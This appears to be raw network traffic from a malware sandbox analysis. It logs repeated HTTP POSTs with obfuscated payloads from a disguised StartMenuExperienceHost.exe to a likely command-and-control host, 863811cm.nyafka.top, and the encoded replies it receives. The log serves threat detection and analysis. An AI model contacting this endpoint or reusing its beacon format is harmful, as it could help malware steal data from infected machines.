                                                                Oct 11, 2024 01:37:55.839432001 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:55.939558029 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:55.939718008 CEST1984OUTData Raw: 50 5d 5d 5a 54 55 5d 54 5e 5a 55 58 51 5d 5a 5b 57 50 58 5f 55 54 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]]ZTU]T^ZUXQ]Z[WPX_UTQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:)>?<\'W'-3<&3!+?9T7$ &.-U* 1$(;#Y$/\*
                                                                Oct 11, 2024 01:37:56.245405912 CEST750INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dqUHCPLJFRA2sVhwk620rOgyetOaocmc%2F6kW3QL6C%2BSkk1wpB3iapeEdo19dAcQLgC%2BJcmw4TK8el2z3IY2gYMXDpnV6%2BmCPpDlG1QedJZ1iNeMRRAl73%2BnWscwTJsIuj%2BrlvRn1"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70ec4e1f78ed-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5d 2a 07 0f 0c 20 3e 20 01 3b 32 24 12 2b 2d 22 14 2b 21 37 59 31 37 3f 1a 2e 3f 25 54 21 05 37 01 2a 5a 2e 5a 24 5a 2b 5b 2b 0b 2a 51 03 1b 39 13 3c 1d 38 0e 2b 0c 0b 5d 3f 32 29 5e 24 55 39 44 2a 13 2d 56 24 3e 0f 06 22 21 09 0d 3e 5a 24 0d 3b 3b 23 0a 2a 5e 26 1e 34 3b 2a 5f 08 13 39 55 28 28 05 09 22 19 35 5e 22 5b 34 0a 21 00 2d 09 2a 39 3d 08 24 33 0a 5e 2f 54 37 02 37 01 0a 09 35 02 2d 0c 34 3e 34 59 31 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98']* > ;2$+-"+!7Y17?.?%T!7*Z.Z$Z+[+*Q9<8+]?2)^$U9D*-V$>"!>Z$;;#*^&4;*_9U(("5^"[4!-*9=$3^/T775-4>4Y1"_")Q?TR0
                                                                Oct 11, 2024 01:37:56.246192932 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:56.347019911 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:56.363007069 CEST2584OUTData Raw: 50 5d 58 59 51 5e 5d 53 5e 5a 55 58 51 52 5a 53 57 5f 58 5a 55 54 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]XYQ^]S^ZUXQRZSW_XZUTQ\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9^<=]<<%- B(/5'+4?&>");!W3(;#Y$/\*
                                                                Oct 11, 2024 01:37:56.618978977 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q8pjEsa6YBrIcK9LDarwTGFezQZDtr4diNqNP2chfXbFpFz2bd%2FQ62dC%2F967SB7GOXqMrqPY7a9uM43PArx0%2FhluwBzF%2F0faLSgVqxmBeRAr2SVKmDP3yA4CP7dKd8gUkVuPHGA0"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70eed8d778ed-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                139192.168.2.550121188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:54.588308096 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:54.943114996 CEST2004OUTData Raw: 50 5f 5d 5b 54 59 58 53 5e 5a 55 58 51 5d 5a 5a 57 50 58 54 55 54 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_][TYXS^ZUXQ]ZZWPXTUTQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?>(+%>?(4]#8'+0%7#Q'!=;4G6*#Y$/\*
                                                                Oct 11, 2024 01:37:55.045191050 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:55.293834925 CEST749INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1yKWBoGiom6lDGvWNcuG%2BO1%2BiriJxzQgFFVG%2FJyUtK7UT1UQcbIyAvD2%2F%2FGAOpDuXaMOJUWd%2F7cj3qAG0TRIqH%2Fq3Va40HCFHu%2B2UEhqBiqq21v1B5Vc3q11N0EBRhLvNPrJAWV2"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70e6be7f0f77-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 3d 39 00 1f 22 3e 34 04 2f 31 05 06 29 13 3a 5f 3f 32 24 06 26 0a 3b 5f 2e 5a 3d 56 21 5d 3c 5e 29 2c 35 07 33 2f 2f 5d 2b 1b 2a 51 03 1b 39 5a 3c 33 24 0e 28 22 21 5f 3f 54 26 00 27 23 39 0b 29 04 21 55 24 00 22 5d 35 08 3b 0e 3e 12 3b 54 2f 15 05 09 3e 06 21 01 23 2b 2a 5f 08 13 39 54 2a 16 20 51 22 09 2d 5c 23 3d 27 1d 22 07 0b 0e 3e 3a 3e 50 30 33 20 5f 38 32 38 59 37 3f 2b 13 35 05 2a 1d 21 3e 28 13 25 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a
                                                                Data Ascii: 98$=9">4/1):_?2$&;_.Z=V!]<^),53//]+*Q9Z<3$("!_?T&'#9)!U$"]5;>;T/>!#+*_9T* Q"-\#='">:>P03 _828Y7?+5*!>(%"_")Q?TR
                                                                Oct 11, 2024 01:37:55.382656097 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                140192.168.2.550122188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:55.430713892 CEST346OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----08Dfp8jjadpVplryN3AuPdkfPQTJuY9T9P
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 3006
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:55.784316063 CEST3006OUTData Raw: 2d 2d 2d 2d 2d 2d 30 38 44 66 70 38 6a 6a 61 64 70 56 70 6c 72 79 4e 33 41 75 50 64 6b 66 50 51 54 4a 75 59 39 54 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                Data Ascii: ------08Dfp8jjadpVplryN3AuPdkfPQTJuY9T9PContent-Disposition: form-data; name="0"Content-Type: text/plainPZ]ZTTX^^ZUXQUZSW_X]UUQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^P
                                                                Oct 11, 2024 01:37:55.876626015 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:56.055000067 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=87lrM32rGsbLUbl%2BpLk9Dr8XWMfBHaJfDxYR0M%2F%2Fvz8%2BtTliqQkk1PruxHgK10I09IDoxrEMv4bmuTIdTLjxyPMdo6V0SN7rU8UnqCQrT7aZjniMBP%2BGSt2U03rBJG9WUs91B%2BMz"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70ebe80a0f8f-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                141192.168.2.550123188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:56.423814058 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:56.769344091 CEST1984OUTData Raw: 50 5c 5d 5c 51 5f 5d 52 5e 5a 55 58 51 53 5a 5e 57 5b 58 5f 55 54 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\]\Q_]R^ZUXQSZ^W[X_UTQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(<?9''><!+(U& B70>=U*+(51X=;#Y$/\*9
                                                                Oct 11, 2024 01:37:56.871715069 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:57.117460012 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uP93GK5qZNDDX6Gfy7QxRxSqDGzX7c8mB3Vyac%2F1Y4pbdmpq%2BWgCWTicQtCegXwji4MHAqqO6eUtyiu91%2Brc2hIzxoUTssJ96sBjgGSIW9%2BCe5u8jC48tPu8aHqxcJV8BpdvLRAI"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70f22e280c86-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 3d 2a 21 0d 37 3e 2c 02 2c 32 3c 1d 2b 3d 31 06 3f 57 28 07 26 1a 3f 17 39 2f 29 57 23 2b 37 00 28 3f 35 06 26 3c 01 5c 3f 31 2a 51 03 1b 39 5e 3f 30 3b 1c 29 22 3a 07 28 0c 22 05 27 33 29 06 3e 2d 03 57 24 3d 22 5c 35 1f 34 1f 29 02 2c 0e 3b 05 2b 0a 2a 28 0c 59 20 2b 2a 5f 08 13 39 50 3d 3b 3c 1d 36 37 25 5c 21 13 16 0c 22 29 08 1a 3d 5f 32 55 30 33 02 14 3b 31 37 03 23 3f 24 08 22 12 00 57 37 3d 3c 1e 31 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$=*!7>,,2<+=1?W(&?9/)W#+7(?5&<\?1*Q9^?0;)":("'3)>-W$="\54),;+*(Y +*_9P=;<67%\!")=_2U03;17#?$"W7=<1"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                142192.168.2.550124188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:56.804837942 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:57.159262896 CEST2584OUTData Raw: 50 5d 58 5f 51 5f 5d 54 5e 5a 55 58 51 57 5a 5b 57 59 58 55 55 55 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]X_Q_]T^ZUXQWZ[WYXUUUQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:([7+3R&>;+6(Y5,<%W $R&>1U)+68Z>#Y$/\*)
                                                                Oct 11, 2024 01:37:57.260731936 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:57.505950928 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tuYcUwvg%2BGuE6uifsBMq4QRQo9p7rKFZwIZZ0AVDz8ue2%2BMKPqkchJJMBXhN3BbRVSjwIJ6jbbV7TH7eJC82%2B7pxPD55qudEg9ieT3YSpIvi592RIORUx7y9d7fU8vNMTTEqK5GG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70f498a1435c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                143192.168.2.550125188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:57.227876902 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:57.581118107 CEST1984OUTData Raw: 50 5e 58 5d 51 5c 58 5e 5e 5a 55 58 51 5d 5a 5f 57 5c 58 5e 55 54 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^X]Q\X^^ZUXQ]Z_W\X^UTQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+[ \+&-<@+75]#( 5U##R0=*((4F528*;#Y$/\*
                                                                Oct 11, 2024 01:37:57.673060894 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:57.932027102 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N10PAeG7qbiGvviAIf7kj6XBLtW8Fvmx0a00fCNEgFEUnvpI0%2BytpDDebVg62R6XvVsgrCVg1IFZanHf6mGpN94w6u%2FUDmuDIgDGA8Hl7RAOnZVg82ej02iomZmbzTom52KplYDZ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70f72a558c3c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5e 28 29 3a 54 34 3e 3f 11 2c 22 23 06 29 04 3a 5c 2b 31 20 00 32 27 3f 1a 2e 02 0f 57 22 2b 0d 05 2a 3f 36 5b 30 02 09 1f 3f 1b 2a 51 03 1b 39 11 28 0a 38 08 2b 0c 26 04 2b 22 2e 05 27 55 35 06 3d 04 2e 0e 27 2e 0c 15 21 21 0a 55 2a 02 01 52 38 38 30 1b 28 38 0f 02 34 3b 2a 5f 08 13 3a 0c 2a 06 24 51 21 34 21 5f 23 2d 3b 57 36 17 26 56 3e 07 3d 08 24 1d 30 58 3b 1c 3f 01 20 3c 2f 57 35 02 32 56 34 3d 06 58 32 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'^():T4>?,"#):\+1 2'?.W"+*?6[0?*Q9(8+&+".'U5=.'.!!U*R880(84;*_:*$Q!4!_#-;W6&V>=$0X;? </W52V4=X2"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                144192.168.2.550126188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:57.629174948 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:57.987435102 CEST2584OUTData Raw: 50 5f 5d 58 54 5a 58 53 5e 5a 55 58 51 56 5a 5e 57 58 58 55 55 55 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_]XTZXS^ZUXQVZ^WXXUUUQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\+(?*(2 <%_"8,(=#?'-2>8"W/>#Y$/\*-
                                                                Oct 11, 2024 01:37:58.076703072 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:58.419059038 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:58.419187069 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J0MBkNaDZQYB74Ylc80F29hER%2BWiE9QT%2BoqdN5C6Aj3vjV87ZROzEnlz%2FzkBVEeRKbawIh6ctZAxMKyAs%2B6gFj2%2B%2B7yhuPkO8oAhAwaV5ZptQLvZqZ9H5q4lbvOnNOrfsZIsDmyv"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70f9be28c360-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                145192.168.2.550127188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:58.040724039 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:58.393668890 CEST1984OUTData Raw: 55 58 58 59 51 5b 5d 55 5e 5a 55 58 51 52 5a 5b 57 5d 58 58 55 57 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UXXYQ[]U^ZUXQRZ[W]XXUWQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(-4\<\<'>+?6##;']+3!#?3-)V)8 1+>;#Y$/\*
                                                                Oct 11, 2024 01:37:58.516354084 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:58.758397102 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w30CjLAl0umj%2F7mpWoDnF3YU4WJ4eyZiiTb772GT8WUHnavx334uVEm7u7bCIzk6ve4vzVg0812%2FZMMUsBceMEemQVViJ%2FeiBuVrSqtCuYlr6kQXKYNW0DHAfRePVF1JkQqrrWHz"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70fc69b21801-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 29 07 2e 54 20 3e 2f 5a 2f 0f 28 58 3d 3d 07 05 2b 0f 20 02 31 34 33 5d 3a 12 2e 0e 22 38 2c 15 3d 3f 2d 02 24 12 30 04 3f 0b 2a 51 03 1b 3a 07 3f 1d 38 0e 29 31 35 17 28 22 0f 17 24 0a 2a 18 29 3d 29 1c 25 3d 2e 5e 22 22 3b 0d 2a 02 09 1d 2c 02 30 18 3d 2b 26 10 37 11 2a 5f 08 13 39 57 2a 38 3f 08 22 09 3a 06 22 5b 3c 0d 22 5f 2a 53 2a 29 00 1c 30 23 20 15 38 22 27 07 23 2f 20 0c 21 12 03 0a 21 2d 0e 11 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$).T >/Z/(X==+ 143]:."8,=?-$0?*Q:?8)15("$*)=)%=.^"";*,0=+&7*_9W*8?":"[<"_*S*)0# 8"'#/ !!-%("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                146192.168.2.550128188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:58.553005934 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
